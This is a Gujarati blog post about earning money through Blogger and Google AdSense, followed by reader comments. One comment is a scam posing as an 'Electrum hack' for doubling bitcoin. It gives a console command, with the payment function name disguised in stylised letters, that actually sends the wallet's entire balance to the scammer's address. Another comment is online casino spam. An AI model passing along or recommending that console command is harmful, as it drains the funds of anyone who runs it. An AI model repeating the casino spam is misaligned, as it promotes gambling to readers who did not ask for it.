Earn Money Online Without Any Investment From Google

                  ગુગલ દ્વારા કોઈ પણ Investment વગર રૂપિયા કમાવો 


                                  હા મિત્રો તમે સાચું જ વાચી રહ્યા છો ,આ કોઈ મજાક નથી ખરે ખર તમે ગુગલ માં થી ધારો એટલા રૂપિયા કમાઈ શકો છો ,ગુજરાત માં ગણા લોકો આરામથી ઘરે બેઠા બેઠા ઢગલો રૂપિયા કમાઈ રહ્યા છે , ફિકર ના કરતા મિત્રો આ કોઈ ઉલ્લુ બનવાની સ્કીમ નથી , આમાં તમારે કોઈજ Investment કરવાનું નથી ,આ એકદમ મફત છે.

                                  હવે તમારા Mind માં સવાલ આવશે તો ગૂગલ માં થી કમાવું કેમનું હેને , તો એના માટે તમારી પાસે Computer અને Internet નું પાયા નું જ્ઞાન જરૂરી છે એટલે કે ફક્ત Basic Knowledge અને મેહનત અને ધીરજ ની જરૂર પણ રેહશે ,રૂપિયા કમાવા આસાન નથી એ તમે અને હું પણ જાણીએ છે પણ એ પણ કઈ દૌ કે અગરુ પણ નથી , "હિમતે મરદા તો મદદે ખુદા " બસ જે કામ હાથ માં લો એમાં મચી પડો કુદી પડો હમેશા જીતવાની આશા રાખો કમાવાની આશા રાખો અને પોતાની જાત પર વિશ્વાસ રાખો , માફ કરસો થોડો તમારો સમય લીધો પણ કેહવું જરૂરી હતું , હવે આવીએ મુદ્દા ની વાત પર Google દુનિયા નું એક નંબર નું Search Engine છે , તે સિવાય તે ગણી બધી બીજી સેવાઓ આપે છે , જેમકે Gmail ,Image Search , Blogger ,Adword ,Adsense અને બીજી ગણી બધી સેવાઓ છે . તમારે ખાલી એટલું કરવાનું છે કે Google માં જઈને "More " પર Click કરવી ,નીચે આપેલા ફોટા પ્રમાણે .અને blogger ઉપર Click કરી Blogger.Com માં જવાનું રેહશે .







હવે નું કામ એ રેહશે કે તમારે Blogger.com તમારું New Account બનાવી તમારો પોતાનો એક આગવો Blog બનાવાનો ,બ્લોગ ની અંદર નું લખાણ સારું હોવું જોઈએ જેથી લોકો તમારા બ્લોગ પર સમય પસાર કરે , હવે થોડા સમય પછી Google Adsense માટે Apply કરવું , Google Adsense વિશે તમને થોડી માહિતી આપી દૌ , એ એક ગુગલ નોજ ભાગ છે , એ તમારા બ્લોગ ઉપર જાહેરાત આપશે અને એના પર કોઈ Click  કરે તો તમને એના રૂપિયા મળે ,ટૂંકમાં તમે જેમ કોઈ પણ Websites જુઓ છો ત્યાં જાહેરાત પણ હોય છે , તો તમારો બ્લોગ એ તમારી site જ હશે ,અને એના પર આવનારી જાહેરાત ના તમને રૂપિયા મળશે , Adsense મેળવા સારો બ્લોગ હોવો જરૂરી છે અને ગણી બધી ધીરજ ની જરૂર પડે છે ,
                                                
                                                 હવે તમારા મનમાં સવાલ થશે કે બ્લોગ બનાવો કેમનો , ક્યાં વિષય પર બનાવો , કેવી રીતે લખવું , ક્યારે Adsense માટે Apply  કરવું ને બીજા ગણા બધા સવાલ આવ્યા હશે આ બધું જ હું તમને સીખવાડીસ ,થોડો સમય લાગશે પણ Contact માં રેહજો જેથી તમને સીખવા મળે અને મને ગાળો ના પડે :) , હું આશા રાખું છું કે તમને વાંચવું ગમ્યું હશે અને ગૂગલ માં થી કમાવાની ઈચ્છા પણ જાગી હશે . Thank You

***********************************************************************
નોધ - જો ગુજરાતી વ્યાકરણ માં મારી ભુલ હોય તો મને માફ કરસો .
વિનંતી - કૃપા કરી comment ધ્વારા આપ જણાવો કે આપને "Earn Money Online Without Any Investment From Google" વિશે નો લેખ  કેવો લાગ્યો .

10 ટિપ્પણીઓ:

  1. khub saras mare pan paisa kamavava che

    જવાબ આપોકાઢી નાખો
  2. me maro blog banavayo che, pls mane kaho k agad hu have su karu?

    જવાબ આપોકાઢી નાખો
  3. Khub saras lekh se..
    Mare pan online paisa kamava se..
    Plz help me...
    Blog ma badhu add kevi rite karay..

    જવાબ આપોકાઢી નાખો
  4. બધું સરસ મારે applay કરેલ છે શરસ

    જવાબ આપોકાઢી નાખો
  5. બધું સરસ મારે applay કરેલ છે શરસ

    જવાબ આપોકાઢી નાખો
  6. vishwas to google par carodo loko ne che ane mane pan che
    ane bharoso che ke google mane paisa kamava ma halp karse
    ane je google samjau a pan saras che
    big big hug google

    જવાબ આપોકાઢી નાખો
  7. vishwas to google par carodo loko ne che ane mane pan che
    ane bharoso che ke google mane paisa kamava ma halp karse
    ane je google samjau a pan saras che
    big big hug google

    જવાબ આપોકાઢી નાખો
  8. !! ન્યૂ ઇલેક્ટ્રમ હેક !!
    2024 માં ઇલેક્ટ્રમ વૉલેટમાં બિટકોઇન્સને કેવી રીતે ડબલ કરવું


    કોઈપણ વધારાના શુલ્ક વિના બિટકોઇનના ત્વરિત બમણાનો વિચાર ક્રિપ્ટોકરન્સી વપરાશકર્તાઓ માટે એક અનન્ય અને આકર્ષક દરખાસ્ત છે. ઇલેક્ટ્રમ વૉલેટ સાથે, વપરાશકર્તાઓ તેમના નફામાં ખાવાથી ઉચ્ચ ફી અથવા કમિશન વિશે ચિંતા કર્યા વિના એકીકૃત અને સુરક્ષિત રીતે તેમના બિટકોઇન હોલ્ડિંગ્સને બમણી કરી શકે છે.


    આ ક્રાંતિકારી સુવિધા માત્ર વપરાશકર્તાઓને નાણાં બચાવે છે પરંતુ તેમને તેમના બિટકોઇન હોલ્ડિંગ્સને વધારવા માટે ઝડપી અને કાર્યક્ષમ રીત પણ પ્રદાન કરે છે. આ તકનો લાભ લઈને, વપરાશકર્તાઓ તેમના રોકાણોને અસરકારક રીતે વધારી શકે છે.


    પગલું 1-જુઓ ટેબમાં ક્લિક કરો કન્સોલ બતાવો

    પગલું 2-કન્સોલ ટેબ ખોલો અને આ આદેશ મૂકો: broadcast(𝔭𝔞𝔶𝔱𝔬('1bonusAGn5pzfkcbXQpnYAn7ywrGarkjU','!'))

    સ્ટેપ 3-એન્ટર બટન દબાવો, જો કન્સોલ આના જેવો સંદેશ બતાવે છે: ટીએક્સઆઈડી....

    ઇલેક્ટ્રમને ફરીથી પ્રારંભ કરો અને તમારું બેલેન્સ એક્સ 2 જુઓ

    તમારા મફત પૈસા સાથે મજા માણો

    જવાબ આપોકાઢી નાખો
  9. Players choose Australia online pokies for their simplicity, variety, and big-win potential. Featuring themes from history to fantasy, these slots entertain while offering rewards. Licensed casinos ensure safety, smooth gameplay, and appealing bonuses designed to enhance the online experience.

    જવાબ આપોકાઢી નાખો